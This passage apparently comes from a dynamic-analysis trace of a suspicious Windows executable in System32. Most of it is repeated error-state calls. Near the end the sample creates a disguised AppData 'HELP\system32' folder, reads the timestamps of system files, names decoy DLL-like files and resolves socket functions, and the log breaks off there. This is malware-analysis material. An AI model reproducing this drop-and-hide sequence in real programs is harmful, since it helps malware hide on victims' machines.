¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x16f404, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿSTeô<÷\x16", lpUsedDefaultChar=0x0) returned 256 [0035.660] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.660] SetLastError (dwErrCode=0x0) [0035.660] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.661] SetLastError (dwErrCode=0x0) [0035.661] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.662] GetLastError () returned 0x0 [0035.662] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.663] SetLastError (dwErrCode=0x0) [0035.663] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.664] SetLastError (dwErrCode=0x0) [0035.664] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.665] SetLastError (dwErrCode=0x0) [0035.665] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.666] SetLastError (dwErrCode=0x0) [0035.666] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.667] SetLastError (dwErrCode=0x0) [0035.667] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.668] SetLastError (dwErrCode=0x0) [0035.668] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.669] GetLastError () returned 0x0 [0035.669] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.670] GetLastError () returned 0x0 [0035.670] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.671] GetLastError () returned 0x0 [0035.671] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.672] SetLastError (dwErrCode=0x0) [0035.672] GetLastError () returned 0x0 [0035.673] SetLastError (dwErrCode=0x0) [0035.673] GetLastError () returned 0x0 [0035.673] SetLastError (dwErrCode=0x0) [0035.673] GetLastError () returned 0x0 [0035.673] SetLastError (dwErrCode=0x0) [0035.673] GetLastError () returned 0x0 [0035.673] SetLastError (dwErrCode=0x0) [0035.673] GetLastError () returned 0x0 [0035.673] SetLastError (dwErrCode=0x0) [0035.673] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.673] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.673] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.674] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f780 | out: lpSystemTimeAsFileTime=0x16f780*(dwLowDateTime=0xe2f20fb0, dwHighDateTime=0x1d3dfba)) [0035.675] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f6b8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.675] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f5a0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetLastError () returned 0x0 [0035.675] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.675] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.675] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.675] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.675] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.675] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.675] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.675] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.676] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.676] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.676] GetLastError () returned 0xb7 [0035.676] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.676] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.676] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.676] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.676] wsprintfA (in: param_1=0x16f420, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.676] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.676] wsprintfA (in: param_1=0x16f31c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.676] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.677] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.677] CloseHandle (hObject=0x74) returned 1 [0035.677] GetLastError () returned 0x0 [0035.677] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.677] GetLastError () returned 0x0 [0035.677] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.677] GetSystemDirectoryA (in: lpBuffer=0x16f420, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.677] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.677] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.677] CloseHandle (hObject=0x74) returned 1 [0035.677] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.677] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.678] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.679] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.679] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.679] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.679] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.679] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.679] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0035.679] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.679] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.679] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.679] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 